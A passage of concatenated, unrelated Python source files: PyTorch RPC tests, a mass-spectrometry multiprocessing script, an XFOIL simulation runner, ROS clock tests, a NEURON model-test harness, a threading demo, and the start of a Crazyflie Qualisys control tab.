another_stream = torch.cuda.Stream("cuda:0")
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(fut.wait(), 3).all().item())
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_cuda_future_modify_tensor_inplace(self):
tensor = torch.zeros((100,), device="cuda:0")
future = Future(devices=["cuda:0"])
future.set_result(tensor)
# It's weird to modify the value of a future once it's complete, but
# technically possible. Currently this is considered undefined behavior
# (in practice the future will ignore the modification and still
# synchronize with the original value). We could one day add logic to
# detect and warn or throw in such cases, but for now we just check that
# this doesn't crash.
tensor.fill_(1)
future.wait()
@skip_if_lt_x_gpu(1)
def test_cuda_future_replace_tensor(self):
tensor_list = [torch.zeros((100,), device="cuda:0")]
future = Future(devices=["cuda:0"])
future.set_result(tensor_list)
# It's weird to modify the value of a future once it's complete, but
# technically possible. Currently this is considered undefined behavior
# (in practice the future will ignore the modification and still
# synchronize with the original value). We could one day add logic to
# detect and warn or throw in such cases, but for now we just check that
# this doesn't crash.
# We set things up so that the original tensor contained in the list
# gets deleted once we replace it with the other one. This will
# invalidate any cached information held by the future.
tensor_list[0] = torch.ones((100,), device="cuda:0")
future.wait()
@skip_if_lt_x_gpu(1)
def test_rref_with_unpickleable_attributes(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rref = rpc.remote(dst, TensorWrapper, args=(torch.zeros(42, device="cuda:0"),))
rref.rpc_sync().increase(1)
ret = rref.rpc_sync().sum()
self.assertEqual(ret, 42)
rpc.shutdown()
|
mp_multifile.py
|
import sys
# import mss
sys.path.append('../')
from mss import mssmain as msm
from mss import align
import multiprocessing
from timeit import default_timer as timer
import glob
import pandas as pd
def main():
start = timer()
input_path = str(input('file path (folder): \n'))
print(glob.glob(input_path + '*.mzML'))
output_path = input('output path (.csv): \n')
noise_thres = int(input('noise threshold: \n'))
error_ppm = int(input('feature extraction error (ppm): \n'))
rt_error = float(input('alignment rt error (min): \n'))
mz_error = float(input('alignment mz error (Da): \n'))
all_scans, file_names = msm.batch_scans(input_path, remove_noise=True, thres_noise=noise_thres)
file_list = [input_path + str(i) + '.csv' for i in file_names]
files = list(zip(all_scans, file_list))
jobs = []
manager = multiprocessing.Manager()
return_dict = manager.dict()
for scans in files:
p = multiprocessing.Process(target=msm.mp_peak_list, args=(scans[0], scans[1], error_ppm, return_dict))
jobs.append(p)
p.start()
for proc in jobs:
proc.join()
df_list = return_dict.values() # Check the order of the dict value!
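    # The managed dict preserves insertion order, but entries are inserted in the
    # order the worker processes finish, not the order of file_list. keys() and
    # values() remain pairwise consistent, so the alignment call below is internally
    # consistent; if the output order should follow file_list instead, and assuming
    # mp_peak_list keys return_dict by the output csv path it is given, something
    # like the following could be used:
    # df_list = [return_dict[path] for path in file_list if path in return_dict]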
alignment = align.mss_align(df_list, output_path, return_dict.keys(), RT_error=rt_error, mz_error=mz_error)
end = timer()
print(f'elapsed time: {end - start}')
return
if __name__ == '__main__':
main()
|
stepRunXFOILSimulationWithSearch.py
|
import json
import os.path
import posixpath
import platform
import sys
import time
from subprocess import Popen, PIPE, STDOUT
from threading import Thread
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty # python 3.x
ON_POSIX = 'posix' in sys.builtin_module_names
def enqueue_output(out, queue):
for line in iter(out.readline, b''):
queue.put(line)
out.close()
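# NOTE: enqueue_output is only referenced from the commented-out non-blocking
# reader block further down; it is unused in the current flow and presumably kept
# so that experiment can be re-enabled.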
def read_testbench_manifest_parameters(testbench_manifest):
parameters_dict = dict()
print "Reading parameters from testbench_manifest.json..."
print
for parameter in testbench_manifest['Parameters']:
parameters_dict[parameter['Name']] = parameter['Value']
print parameter['Name'] + ": " + str(parameter['Value'])
print
return parameters_dict
if __name__ == '__main__':
print "Running " + str(__file__) + "..."
#Obtain alpha
with open('testbench_manifest.json', 'r') as f_in:
testbench_manifest = json.load(f_in)
alpha = float(read_testbench_manifest_parameters(testbench_manifest)["Alpha"])
#Run the XFoil simulation ------------------------------------------------------------------------------------------
print "Opening 'script.xfoil'..."
with open('script.xfoil', 'r') as f_in:
xfoil_script = f_in.readlines()
files = ["plot.ps", "polar.txt"]
for f in files:
if os.path.exists(f):
os.remove(f)
print "Running XFOIL simulation..."
converged = False
if platform.system() == 'Windows':
p = Popen(['C:/OpenMETA/xfoil-and-nrel-codes/bin/xfoil.exe'], stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=ON_POSIX)
elif platform.system() == 'Darwin':
p = Popen(['/Applications/Xfoil.app/Contents/Resources/xfoil'], stdin=PIPE, stdout=PIPE, stderr=STDOUT)
'''
q = Queue()
t = Thread(target=enqueue_output, args=(p.stdout, q))
t.daemon = True # thread dies with the program
t.start()
#Setup
for i in range(len(xfoil_script)):
print ">>> {}".format(xfoil_script[i][:-1])
p.stdin.write(xfoil_script[i])
# read line without blocking
try:
line = q.get_nowait() # or q.get(timeout=.1)
except Empty:
print('no output yet')
else: # got line
print line
'''
#Setup
for i in range(9):
print ">>> {}".format(xfoil_script[i][:-1])
p.stdin.write(xfoil_script[i])
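    # Ramp the angle of attack from 5.0 degrees toward the requested alpha in
    # 0.5 degree steps, issuing "alfa" followed by two "!" commands (re-running the
    # previous operation) at each step so the viscous solution converges gradually
    # rather than jumping straight to the target angle. This assumes alpha is
    # reachable from 5.0 in 0.5 degree increments; otherwise the equality test in
    # the while loop below would never be satisfied.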
start_alpha = 5.0
if start_alpha > alpha:
offset = -0.5
else:
offset = 0.5
while start_alpha != alpha:
print ">>> {}".format("alfa {}".format(start_alpha))
print ">>> !"
print ">>> !"
p.stdin.write("alfa {}\n".format(start_alpha))
p.stdin.write("!\n")
p.stdin.write("!\n")
start_alpha += offset
print ">>> {}".format("alfa {}".format(start_alpha))
print ">>> !"
print ">>> !"
p.stdin.write("alfa {}\n".format(start_alpha))
p.stdin.write("!\n")
p.stdin.write("!\n")
for i in range(12, 17):
print ">>> {}".format(xfoil_script[i][:-1])
p.stdin.write(xfoil_script[i])
p.stdin.close() # Needed or else the script hangs.
p.stdout.close() # See: https://stackoverflow.com/questions/21141712/subprocess-popen-communicate-vs-stdin-write-and-stdout-read
    if p.stderr is not None: # stderr is redirected to stdout above, so p.stderr is None here
        p.stderr.close() # and: https://stackoverflow.com/questions/27451182/proper-way-to-close-all-files-after-subprocess-popen-and-communicate?rq=1
converged = True
# result = p.communicate(input=xfoil_script)
result = ["",""]
#Save log files
print "Saving log files..."
with open(os.path.join('log', 'xfoil-stdout.log'), 'w') as f_out:
f_out.write(result[0])
with open(os.path.join('log', 'xfoil-stderr.log'), 'w') as f_out:
if result[1]:
f_out.write(result[1])
else:
# empty file
pass
# if converged:
# with open('polar.txt', 'r') as f_in:
# polar_lines = f_in.readlines()
# for line in polar_lines:
# print line[:-1]
# print len(polar_lines)
# final_line=polar_lines[-1].split()
# # Alpha = final_line[0]
# CL = final_line[1]
# CD = final_line[2]
# CM = final_line[4]
# print CL
# print CD
# print CM
#Add artifacts to "artifacts" in testbench_manifest.json
print "Recording artifacts..."
with open('testbench_manifest.json', 'r') as f_in:
testbench_manifest = json.load(f_in)
expected_files = {"plot": "plot.ps",
"polar table": "polar.txt",
"XFOIL stdout log": posixpath.join("log", "xfoil-stdout.log"),
"XFOIL stderr log": posixpath.join("log", "xfoil-stderr.log")}
artifacts = testbench_manifest["Artifacts"]
for k, v in expected_files.iteritems():
if os.path.exists(v):
artifacts.append({"Tag": k, "Location": v})
with open('testbench_manifest.json', 'w') as f_out:
json.dump(testbench_manifest, f_out, indent=2)
print "Done."
#Let the testbench executor know how the job went
    p.wait() # wait for XFOIL to exit so returncode is populated instead of None
    sys.exit(p.returncode)
|
test_clock.py
|
# Copyright 2018 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import time
import unittest
from unittest.mock import Mock
import pytest
import rclpy
from rclpy.clock import Clock
from rclpy.clock import ClockType
from rclpy.clock import JumpHandle
from rclpy.clock import JumpThreshold
from rclpy.clock import ROSClock
from rclpy.context import Context
from rclpy.duration import Duration
from rclpy.exceptions import NotInitializedException
from rclpy.time import Time
from rclpy.utilities import get_default_context
from .mock_compat import __name__ as _ # noqa: ignore=F401
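# Tolerance used by the tests below to assert that an interrupted or already-expired sleep returns promptly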
A_SMALL_AMOUNT_OF_TIME = Duration(seconds=0.5)
def test_invalid_jump_threshold():
with pytest.raises(ValueError, match='.*min_forward.*'):
JumpThreshold(
min_forward=Duration(nanoseconds=0),
min_backward=Duration(nanoseconds=-1))
with pytest.raises(ValueError, match='.*min_forward.*'):
JumpThreshold(
min_forward=Duration(nanoseconds=-1),
min_backward=Duration(nanoseconds=-1))
with pytest.raises(ValueError, match='.*min_backward.*'):
JumpThreshold(
min_forward=Duration(nanoseconds=1),
min_backward=Duration(nanoseconds=0))
with pytest.raises(ValueError, match='.*min_backward.*'):
JumpThreshold(
min_forward=Duration(nanoseconds=1),
min_backward=Duration(nanoseconds=1))
with pytest.raises(ValueError, match='.*must be enabled.*'):
JumpThreshold(
min_forward=None,
min_backward=None,
on_clock_change=False)
class TestClock(unittest.TestCase):
def test_clock_construction(self):
clock = Clock()
with self.assertRaises(TypeError):
clock = Clock(clock_type='STEADY_TIME')
clock = Clock(clock_type=ClockType.STEADY_TIME)
assert clock.clock_type == ClockType.STEADY_TIME
clock = Clock(clock_type=ClockType.SYSTEM_TIME)
assert clock.clock_type == ClockType.SYSTEM_TIME
# A subclass ROSClock is returned if ROS_TIME is specified.
clock = Clock(clock_type=ClockType.ROS_TIME)
assert clock.clock_type == ClockType.ROS_TIME
assert isinstance(clock, ROSClock)
# Direct instantiation of a ROSClock is also possible.
clock = ROSClock()
assert clock.clock_type == ClockType.ROS_TIME
def test_clock_now(self):
# System time should be roughly equal to time.time()
# There will still be differences between them, with the bound depending on the scheduler.
clock = Clock(clock_type=ClockType.SYSTEM_TIME)
now = clock.now()
python_time_sec = time.time()
assert isinstance(now, Time)
assert abs(now.nanoseconds * 1e-9 - python_time_sec) < 5
        # Unless there is a date change during the test, system time should have increased
        # between these calls.
now2 = clock.now()
assert now2 > now
# Steady time should always return increasing values
clock = Clock(clock_type=ClockType.STEADY_TIME)
now = clock.now()
now2 = now
for i in range(10):
now2 = clock.now()
assert now2 > now
now = now2
def test_ros_time_is_active(self):
clock = ROSClock()
clock._set_ros_time_is_active(True)
assert clock.ros_time_is_active
clock._set_ros_time_is_active(False)
assert not clock.ros_time_is_active
def test_triggered_time_jump_callbacks(self):
one_second = Duration(seconds=1)
half_second = Duration(seconds=0.5)
negative_half_second = Duration(seconds=-0.5)
negative_one_second = Duration(seconds=-1)
threshold1 = JumpThreshold(
min_forward=one_second, min_backward=negative_half_second, on_clock_change=False)
threshold2 = JumpThreshold(
min_forward=half_second, min_backward=negative_one_second, on_clock_change=False)
pre_callback1 = Mock()
post_callback1 = Mock()
pre_callback2 = Mock()
post_callback2 = Mock()
clock = ROSClock()
handler1 = clock.create_jump_callback(
threshold1, pre_callback=pre_callback1, post_callback=post_callback1)
handler2 = clock.create_jump_callback(
threshold2, pre_callback=pre_callback2, post_callback=post_callback2)
clock.set_ros_time_override(Time(seconds=1))
clock._set_ros_time_is_active(True)
pre_callback1.assert_not_called()
post_callback1.assert_not_called()
pre_callback2.assert_not_called()
post_callback2.assert_not_called()
# forward jump
clock.set_ros_time_override(Time(seconds=1.75))
pre_callback1.assert_not_called()
post_callback1.assert_not_called()
pre_callback2.assert_called()
post_callback2.assert_called()
pre_callback1.reset_mock()
post_callback1.reset_mock()
pre_callback2.reset_mock()
post_callback2.reset_mock()
# backwards jump
clock.set_ros_time_override(Time(seconds=1))
pre_callback1.assert_called()
post_callback1.assert_called()
pre_callback2.assert_not_called()
post_callback2.assert_not_called()
handler1.unregister()
handler2.unregister()
def test_triggered_clock_change_callbacks(self):
one_second = Duration(seconds=1)
negative_one_second = Duration(seconds=-1)
threshold1 = JumpThreshold(
min_forward=one_second, min_backward=negative_one_second, on_clock_change=False)
threshold2 = JumpThreshold(min_forward=None, min_backward=None, on_clock_change=True)
threshold3 = JumpThreshold(
min_forward=one_second, min_backward=negative_one_second, on_clock_change=True)
pre_callback1 = Mock()
post_callback1 = Mock()
pre_callback2 = Mock()
post_callback2 = Mock()
pre_callback3 = Mock()
post_callback3 = Mock()
clock = ROSClock()
handler1 = clock.create_jump_callback(
threshold1, pre_callback=pre_callback1, post_callback=post_callback1)
handler2 = clock.create_jump_callback(
threshold2, pre_callback=pre_callback2, post_callback=post_callback2)
handler3 = clock.create_jump_callback(
threshold3, pre_callback=pre_callback3, post_callback=post_callback3)
clock._set_ros_time_is_active(True)
pre_callback1.assert_not_called()
post_callback1.assert_not_called()
pre_callback2.assert_called()
post_callback2.assert_called()
pre_callback3.assert_called()
post_callback3.assert_called()
pre_callback1.reset_mock()
post_callback1.reset_mock()
pre_callback2.reset_mock()
post_callback2.reset_mock()
pre_callback3.reset_mock()
post_callback3.reset_mock()
clock._set_ros_time_is_active(True)
pre_callback1.assert_not_called()
post_callback1.assert_not_called()
pre_callback2.assert_not_called()
post_callback2.assert_not_called()
pre_callback3.assert_not_called()
post_callback3.assert_not_called()
handler1.unregister()
handler2.unregister()
handler3.unregister()
@pytest.fixture()
def default_context():
rclpy.init()
yield get_default_context()
rclpy.shutdown()
@pytest.fixture()
def non_default_context():
context = Context()
context.init()
yield context
context.try_shutdown()
def test_sleep_until_mismatched_clock_type(default_context):
clock = Clock(clock_type=ClockType.SYSTEM_TIME)
with pytest.raises(ValueError, match='.*clock type does not match.*'):
clock.sleep_until(Time(clock_type=ClockType.STEADY_TIME))
def test_sleep_until_non_default_context(non_default_context):
clock = Clock()
assert clock.sleep_until(clock.now() + Duration(seconds=0.1), context=non_default_context)
def test_sleep_for_non_default_context(non_default_context):
clock = Clock()
assert clock.sleep_for(Duration(seconds=0.1), context=non_default_context)
def test_sleep_until_invalid_context():
clock = Clock()
with pytest.raises(NotInitializedException):
clock.sleep_until(clock.now() + Duration(seconds=0.1), context=Context())
def test_sleep_for_invalid_context():
clock = Clock()
with pytest.raises(NotInitializedException):
clock.sleep_for(Duration(seconds=0.1), context=Context())
@pytest.mark.parametrize(
'clock_type', (ClockType.SYSTEM_TIME, ClockType.STEADY_TIME, ClockType.ROS_TIME))
def test_sleep_until_basic(default_context, clock_type):
clock = Clock(clock_type=clock_type)
sleep_duration = Duration(seconds=0.1)
start = clock.now()
assert clock.sleep_until(clock.now() + sleep_duration)
stop = clock.now()
assert stop - start >= sleep_duration
@pytest.mark.parametrize(
'clock_type', (ClockType.SYSTEM_TIME, ClockType.STEADY_TIME, ClockType.ROS_TIME))
def test_sleep_for_basic(default_context, clock_type):
clock = Clock(clock_type=clock_type)
sleep_duration = Duration(seconds=0.1)
start = clock.now()
assert clock.sleep_for(sleep_duration)
stop = clock.now()
assert stop - start >= sleep_duration
@pytest.mark.parametrize(
'clock_type', (ClockType.SYSTEM_TIME, ClockType.STEADY_TIME, ClockType.ROS_TIME))
def test_sleep_until_time_in_past(default_context, clock_type):
clock = Clock(clock_type=clock_type)
sleep_duration = Duration(seconds=-1)
start = clock.now()
assert clock.sleep_until(clock.now() + sleep_duration)
stop = clock.now()
assert stop - start < A_SMALL_AMOUNT_OF_TIME
@pytest.mark.parametrize(
'clock_type', (ClockType.SYSTEM_TIME, ClockType.STEADY_TIME, ClockType.ROS_TIME))
def test_sleep_for_negative_duration(default_context, clock_type):
clock = Clock(clock_type=clock_type)
sleep_duration = Duration(seconds=-1)
start = clock.now()
assert clock.sleep_for(sleep_duration)
stop = clock.now()
assert stop - start < A_SMALL_AMOUNT_OF_TIME
@pytest.mark.parametrize('ros_time_enabled', (True, False))
def test_sleep_until_ros_time_toggled(default_context, ros_time_enabled):
clock = ROSClock()
clock._set_ros_time_is_active(not ros_time_enabled)
retval = None
def run():
nonlocal retval
retval = clock.sleep_until(clock.now() + Duration(seconds=10))
t = threading.Thread(target=run)
t.start()
# wait for thread to get inside sleep_until call
time.sleep(0.2)
clock._set_ros_time_is_active(ros_time_enabled)
# wait for thread to exit
start = clock.now()
t.join()
stop = clock.now()
assert stop - start < A_SMALL_AMOUNT_OF_TIME
assert retval is False
@pytest.mark.parametrize('ros_time_enabled', (True, False))
def test_sleep_for_ros_time_toggled(default_context, ros_time_enabled):
clock = ROSClock()
clock._set_ros_time_is_active(not ros_time_enabled)
retval = None
def run():
nonlocal retval
retval = clock.sleep_for(Duration(seconds=10))
t = threading.Thread(target=run)
t.start()
# wait for thread to get inside sleep_for call
time.sleep(0.2)
clock._set_ros_time_is_active(ros_time_enabled)
# wait for thread to exit
start = clock.now()
t.join()
stop = clock.now()
assert stop - start < A_SMALL_AMOUNT_OF_TIME
assert retval is False
def test_sleep_until_context_shut_down(non_default_context):
clock = Clock()
retval = None
def run():
nonlocal retval
retval = clock.sleep_until(
clock.now() + Duration(seconds=10), context=non_default_context)
t = threading.Thread(target=run)
t.start()
# wait for thread to get inside sleep_until call
time.sleep(0.2)
non_default_context.shutdown()
# wait for thread to exit
start = clock.now()
t.join()
stop = clock.now()
assert stop - start < A_SMALL_AMOUNT_OF_TIME
assert retval is False
def test_sleep_for_context_shut_down(non_default_context):
clock = Clock()
retval = None
def run():
nonlocal retval
retval = clock.sleep_for(Duration(seconds=10), context=non_default_context)
t = threading.Thread(target=run)
t.start()
# wait for thread to get inside sleep_for call
time.sleep(0.2)
non_default_context.shutdown()
# wait for thread to exit
start = clock.now()
t.join()
stop = clock.now()
assert stop - start < A_SMALL_AMOUNT_OF_TIME
assert retval is False
def test_sleep_until_ros_time_enabled(default_context):
clock = ROSClock()
clock._set_ros_time_is_active(True)
start_time = Time(seconds=1, clock_type=ClockType.ROS_TIME)
stop_time = start_time + Duration(seconds=10)
clock.set_ros_time_override(start_time)
retval = None
def run():
nonlocal retval
retval = clock.sleep_until(stop_time)
t = threading.Thread(target=run)
t.start()
# wait for thread to get inside sleep_until call
time.sleep(0.2)
clock.set_ros_time_override(stop_time)
# wait for thread to exit
start = clock.now()
t.join()
stop = clock.now()
assert stop - start < A_SMALL_AMOUNT_OF_TIME
assert retval
def test_sleep_for_ros_time_enabled(default_context):
clock = ROSClock()
clock._set_ros_time_is_active(True)
start_time = Time(seconds=1, clock_type=ClockType.ROS_TIME)
sleep_duration = Duration(seconds=10)
stop_time = start_time + sleep_duration
clock.set_ros_time_override(start_time)
retval = None
def run():
nonlocal retval
retval = clock.sleep_for(sleep_duration)
t = threading.Thread(target=run)
t.start()
# wait for thread to get inside sleep_for call
time.sleep(0.2)
clock.set_ros_time_override(stop_time)
# wait for thread to exit
start = clock.now()
t.join()
stop = clock.now()
assert stop - start < A_SMALL_AMOUNT_OF_TIME
assert retval
def test_with_jump_handle():
clock = ROSClock()
clock._set_ros_time_is_active(False)
post_callback = Mock()
threshold = JumpThreshold(min_forward=None, min_backward=None, on_clock_change=True)
with clock.create_jump_callback(threshold, post_callback=post_callback) as jump_handler:
assert isinstance(jump_handler, JumpHandle)
clock._set_ros_time_is_active(True)
post_callback.assert_called_once()
post_callback.reset_mock()
clock._set_ros_time_is_active(False)
post_callback.assert_not_called()
|
ModelTest.py
|
import os
import signal
import sys
import time
from abc import ABCMeta, abstractmethod
from subprocess import Popen, PIPE
from threading import Thread
import json
import psutil
class ModelTest(object):
@abstractmethod
def prepare(self, h, soma, mechanism):
pass
@abstractmethod
def on_run_complete(self):
pass
@abstractmethod
def getResults(self):
raise NotImplementedError()
def __init__(self):
self.error = False
self.saveStartDir()
def saveStartDir(self):
self.startPath = os.getcwd()
def restoreStartDir(self):
os.chdir(self.startPath)
def modelDir(self):
return os.path.dirname(self.path)
def modelFileName(self):
return os.path.basename(self.path)
def resultsDir(self):
return os.path.dirname(self.resultsFile)
def comparisonPath(self):
return self.resultsDir() + "/comparison.png"
def loadResults(self):
with open(self.resultsFile) as r:
result = json.load(r)
return result
def getResultsOwnThread(self):
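        # Run getResults() of this test class in a separate Python process so the results are
        # produced in a fresh interpreter.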
self.printAndRun('python -c "from ' + self.__class__.__module__ + ' import ' + self.__class__.__name__ + ' as test; test().getResults();"')
def printAndRun(self, command):
sys.stdout.write('Running: "' + command + '" ... ')
startDir = os.getcwd()
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty # python 3.x
ON_POSIX = 'posix' in sys.builtin_module_names
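        # Reader-thread target: drain the child's stdout first, then stderr, pushing each line
        # onto the queue for the polling loop below.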
def enqueue_output(out, err, queue):
for line in iter(out.readline, b''):
queue.put(line)
out.close()
for line in iter(err.readline, b''):
queue.put(line)
err.close()
q = Queue()
p = Popen(command, shell=True, stdout=PIPE, stderr=PIPE, bufsize=1, close_fds=ON_POSIX)
t = Thread(target=enqueue_output, args=(p.stdout, p.stderr, q))
t.daemon = True # thread dies with the program
lines = ""
# read line without blocking
# check if process is alive and if so, wait up to 5 mins for output
# handle non-outputting short processes eg. rm ...
# and long running, non-outputting processes like neuron run
# and long running, hung processes that show an error
# Start the process
pid = p.pid
t.start()
keepChecking = True
# Check for errors in output
while keepChecking:
# Get all lines thus far from process
try:
line = ""
while True:
line = line + q.get_nowait()
# No more lines
except Empty:
pass
# If no lines received, wait
if line == "":
time.sleep(0.01)
# Process the output line
else:
lines = lines + line
errorsFound = self.errorsFound(line)
if errorsFound:
logFile = startDir + "/error.log"
with(open(logFile, "w")) as f:
f.write(command)
f.write(lines)
self.kill_proc_tree(pid)
print('ERROR')
print(lines)
assert not errorsFound # See error.log file in script start folder
# If the thread is dead and there are no more output lines, stop checking
if not t.isAlive() and q.empty():
keepChecking = False
print('OK')
def errorsFound(self, line):
# Clear false alarms
cleanOutput = line \
.replace("NRN Error", "") \
.replace("NMODL Error", "") \
.lower()
errorsFound = 'error' in cleanOutput or \
'segmentation fault' in cleanOutput or \
'is not valid against the schema' in cleanOutput or \
'problem in model' in cleanOutput or \
'traceback' in cleanOutput or \
'out of range, returning exp' in cleanOutput
return errorsFound
    def kill_proc_tree(self, pid, sig=signal.SIGTERM, include_parent=True,
                       timeout=None, on_terminate=None):
        """Kill a process tree (including grandchildren) with signal
        "sig" and return a (gone, still_alive) tuple.
        "on_terminate", if specified, is a callback function which is
called as soon as a child terminates.
"""
if pid == os.getpid():
raise RuntimeError("I refuse to kill myself")
parent = psutil.Process(pid)
children = parent.children(recursive=True)
if include_parent:
children.append(parent)
for p in children:
p.send_signal(sig)
gone, alive = psutil.wait_procs(children, timeout=timeout,
callback=on_terminate)
return (gone, alive)
|
timeitTest.py
|
# timeitTest.py
import threading
import random
import time
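# Each worker sleeps for a random 1-5 seconds, five times, so the three threads below
# finish at different times.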
def myWorker():
for i in range(5):
print("Starting wait time")
time.sleep(random.randint(1, 5))
print("Completed Wait")
thread1 = threading.Thread(target=myWorker)
thread2 = threading.Thread(target=myWorker)
thread3 = threading.Thread(target=myWorker)
thread1.start()
thread2.start()
thread3.start()
thread1.join()
thread2.join()
thread3.join()
|
QualisysTab.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# || ____ _ __
# +------+ / __ )(_) /_______________ _____ ___
# | 0xBC | / __ / / __/ ___/ ___/ __ `/_ / / _ \
# +------+ / /_/ / / /_/ /__/ / / /_/ / / /_/ __/
# || || /_____/_/\__/\___/_/ \__,_/ /___/\___/
#
# Copyright (C) 2011-2013 Bitcraze AB
#
# Crazyflie Nano Quadcopter Client
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
"""
Tab for controlling the Crazyflie using Qualisys Motion Capturing system
"""
import logging
import time
import datetime
import math
from enum import Enum
from PyQt5 import uic
from PyQt5.QtCore import pyqtSignal, pyqtSlot, QObject, pyqtProperty
from PyQt5.QtCore import QStateMachine, QState, QEvent, QTimer
from PyQt5.QtCore import QAbstractTransition
from PyQt5.QtWidgets import QMessageBox
from PyQt5.QtGui import QStandardItemModel, QStandardItem
import cfclient
from cfclient.ui.tab import Tab
from cfclient.utils.config import Config
from cflib.crazyflie.log import LogConfig
from cflib.crazyflie.syncLogger import SyncLogger
import xml.etree.cElementTree as ET
import threading
import qtm
import asyncio
__author__ = 'Bitcraze AB'
__all__ = ['QualisysTab']
logger = logging.getLogger(__name__)
qualisys_tab_class, _ = uic.loadUiType(cfclient.module_path +
"/ui/tabs/qualisysTab.ui")
class FlightModeEvent(QEvent):
def __init__(self, mode, parent=None):
super(FlightModeEvent, self).__init__(QEvent.Type(QEvent.User + 1))
self.mode = mode
class FlightModeTransition(QAbstractTransition):
def __init__(self, value, parent=None):
super(FlightModeTransition, self).__init__(parent)
self.value = value
def eventTest(self, event):
if event.type() != QEvent.Type(QEvent.User + 1):
return False
return event.mode == self.value
def onTransition(self, event):
pass
class FlightModeStates(Enum):
LAND = 0
LIFT = 1
FOLLOW = 2
PATH = 3
HOVERING = 4
GROUNDED = 5
DISCONNECTED = 6
CIRCLE = 7
RECORD = 8
COLOR_BLUE = '#3399ff'
COLOR_GREEN = '#00ff60'
COLOR_RED = '#cc0404'
def progressbar_stylesheet(color):
return """
QProgressBar {
border: 1px solid #AAA;
background-color: transparent;
}
QProgressBar::chunk {
background-color: """ + color + """;
}
"""
def start_async_task(task):
return asyncio.ensure_future(task)
class QDiscovery(QObject):
discoveringChanged = pyqtSignal(bool)
discoveredQTM = pyqtSignal(str, str)
def __init__(self, *args):
super().__init__(*args)
self._discovering = False
self._found_qtms = {}
@pyqtProperty(bool, notify=discoveringChanged)
def discovering(self):
return self._discovering
@discovering.setter
def discovering(self, value):
if value != self._discovering:
self._discovering = value
self.discoveringChanged.emit(value)
def discover(self, *, interface='0.0.0.0'):
self.discovering = True
start_async_task(self._discover_qtm(interface))
async def _discover_qtm(self, interface):
try:
async for qtm_instance in qtm.Discover(interface):
info = qtm_instance.info.decode("utf-8").split(",")[0]
self.discoveredQTM.emit(info, qtm_instance.host)
except Exception as e:
logger.info("Exception during qtm discovery: %s", e)
self.discovering = False
class QualisysTab(Tab, qualisys_tab_class):
"""
Tab for controlling the crazyflie using
Qualisys Motion Capturing system
"""
_connected_signal = pyqtSignal(str)
_disconnected_signal = pyqtSignal(str)
_log_data_signal = pyqtSignal(int, object, object)
_log_error_signal = pyqtSignal(object, str)
_param_updated_signal = pyqtSignal(str, str)
_imu_data_signal = pyqtSignal(int, object, object)
_flight_path_select_row = pyqtSignal(int)
_flight_path_set_model = pyqtSignal(object)
_path_selector_add_item = pyqtSignal(str)
_path_selector_set_index = pyqtSignal(int)
statusChanged = pyqtSignal(str)
cfStatusChanged = pyqtSignal(str)
qtmStatusChanged = pyqtSignal(str)
def __init__(self, tabWidget, helper, *args):
super(QualisysTab, self).__init__(*args)
self.setupUi(self)
self._machine = QStateMachine()
self._setup_states()
self._event = threading.Event()
self.tabName = "Qualisys"
self.menuName = "Qualisys Tab"
self.tabWidget = tabWidget
self.qtm_6DoF_labels = None
self._helper = helper
self._qtm_connection = None
self._cf = None
self.model = QStandardItemModel(10, 4)
self._cf_status = self.cfStatusLabel.text()
self._status = self.statusLabel.text()
self._qtm_status = self.qtmStatusLabel.text()
self.flying_enabled = False
self.switch_flight_mode(FlightModeStates.DISCONNECTED)
self.path_pos_threshold = 0.2
self.circle_pos_threshold = 0.1
self.circle_radius = 1.5
self.circle_resolution = 15.0
self.position_hold_timelimit = 0.1
self.length_from_wand = 2.0
self.circle_height = 1.2
self.new_path = []
self.recording = False
self.land_for_recording = False
self.default_flight_paths = [
[
"Path 1: Sandbox",
[0.0, -1.0, 1.0, 0.0],
[0.0, 1.0, 1.0, 0.0]],
[
"Path 2: Height Test",
[0.0, 0.0, 0.5, 0.0],
[0.0, 0.0, 1.0, 0.0],
[0.0, 0.0, 1.5, 0.0],
[0.0, 0.0, 2.0, 0.0],
[0.0, 0.0, 2.3, 0.0],
[0.0, 0.0, 1.8, 0.0],
[0.0, 0.0, 0.5, 0.0],
[0.0, 0.0, 0.3, 0.0],
[0.0, 0.0, 0.15, 0.0]],
[
"Path 3: 'Spiral'",
[0.0, 0.0, 1.0, 0.0],
[0.5, 0.5, 1.0, 0.0],
[0.0, 1.0, 1.0, 0.0],
[-0.5, 0.5, 1.0, 0.0],
[0.0, 0.0, 1.0, 0.0],
[0.5, 0.5, 1.2, 0.0],
[0.0, 1.0, 1.4, 0.0],
[-0.5, 0.5, 1.6, 0.0],
[0.0, 0.0, 1.8, 0.0],
[0.5, 0.5, 1.5, 0.0],
[0.0, 1.0, 1.0, 0.0],
[-0.5, 0.5, 0.5, 0.0],
[0.0, 0.0, 0.25, 0.0]]]
# The position and rotation of the cf and wand obtained by the
        # camera tracking; if it can't be tracked the position becomes NaN
self.cf_pos = Position(0, 0, 0)
self.wand_pos = Position(0, 0, 0)
        # The regular cf_pos can at times become NaN due to lost tracking;
        # this is the latest known valid cf position
self.valid_cf_pos = Position(0, 0, 0)
try:
